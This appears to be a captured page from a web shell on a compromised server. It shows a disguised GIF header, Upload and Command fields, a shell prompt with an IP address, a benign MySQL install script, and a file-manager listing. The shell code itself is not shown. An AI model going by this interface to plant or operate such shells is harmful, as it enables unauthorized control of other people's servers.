GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@3.145.75.74: ~ $
#!/bin/sh

SCRIPT_NAME="`basename $0`"

usage()
{
  echo "Usage: ${SCRIPT_NAME} [--help|-h]"
  echo ""
  echo "This script creates the MySQL system tables and starts the server."
}

for arg do
  case "$arg" in
    --help|-h)
      usage
      exit 0
      ;;
    *)
      echo "${SCRIPT_NAME}: unknown option $arg"
      usage
      exit 2
      ;;
  esac
done

if test ! -x  ./scripts/mysql_install_db
then
  echo "I didn't find the script './scripts/mysql_install_db'."
  echo "Please execute this script in the mysql distribution directory!"
  exit 1;
fi

echo "NOTE: This is a MySQL binary distribution. It's ready to run, you don't"
echo "need to configure it!"
echo ""
echo "To help you a bit, I am now going to create the needed MySQL databases"
echo "and start the MySQL server for you.  If you run into any trouble, please"
echo "consult the MySQL manual, that you can find in the Docs directory."
echo ""

./scripts/mysql_install_db --no-defaults
if [ $? = 0 ]
then
  echo "Starting the mysqld server.  You can test that it is up and running"
  echo "with the command:"
  echo "./bin/mysqladmin version"
  ./bin/mysqld_safe --no-defaults &
fi

Filemanager

Name Type Size Permission Actions
charsets Folder 0755
czech Folder 0755
danish Folder 0755
dutch Folder 0755
english Folder 0755
estonian Folder 0755
french Folder 0755
german Folder 0755
greek Folder 0755
hindi Folder 0755
hungarian Folder 0755
italian Folder 0755
japanese Folder 0755
korean Folder 0755
norwegian Folder 0755
norwegian-ny Folder 0755
policy Folder 0755
polish Folder 0755
portuguese Folder 0755
romanian Folder 0755
russian Folder 0755
serbian Folder 0755
slovak Folder 0755
spanish Folder 0755
swedish Folder 0755
systemd Folder 0755
ukrainian Folder 0755
binary-configure File 1.13 KB 0755
errmsg-utf8.txt File 532.62 KB 0644
fill_help_tables.sql File 2 MB 0644
install_spider.sql File 22.77 KB 0644
magic File 1.3 KB 0644
maria_add_gis_sp.sql File 1.65 KB 0644
maria_add_gis_sp_bootstrap.sql File 1.63 KB 0644
mysql-log-rotate File 892 B 0755
mysql.server File 11.9 KB 0755
mysql_performance_tables.sql File 1.91 KB 0644
mysql_system_tables.sql File 28.31 KB 0644
mysql_system_tables_data.sql File 3.56 KB 0644
mysql_test_data_timezone.sql File 10.17 KB 0644
mysql_test_db.sql File 1.63 KB 0644
mysqld_multi.server File 1.53 KB 0755
wsrep.cnf File 3.39 KB 0644
wsrep_notify File 4.8 KB 0755